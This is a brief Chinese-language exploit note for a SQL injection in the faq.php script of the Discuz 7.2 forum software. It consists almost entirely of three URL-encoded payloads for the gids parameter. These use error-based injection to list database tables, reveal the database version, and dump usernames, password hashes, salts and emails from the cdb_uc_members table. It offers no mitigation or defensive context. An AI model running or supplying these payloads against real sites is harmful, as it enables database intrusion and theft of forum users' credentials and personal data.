Discuz 7.2 faq.php SQL注入

利用方式如下：
action=grouppermission&gids[99]='&gids[100][0]=) and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(hex(table_name)) FROM information_schema.tables where table_schema=database() limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

action=grouppermission&gids[99]='&gids[100][0]=) and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7c,username,0x7C,password,0x3a,salt,0x7C,email,0x7c) FROM cdb_uc_members LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23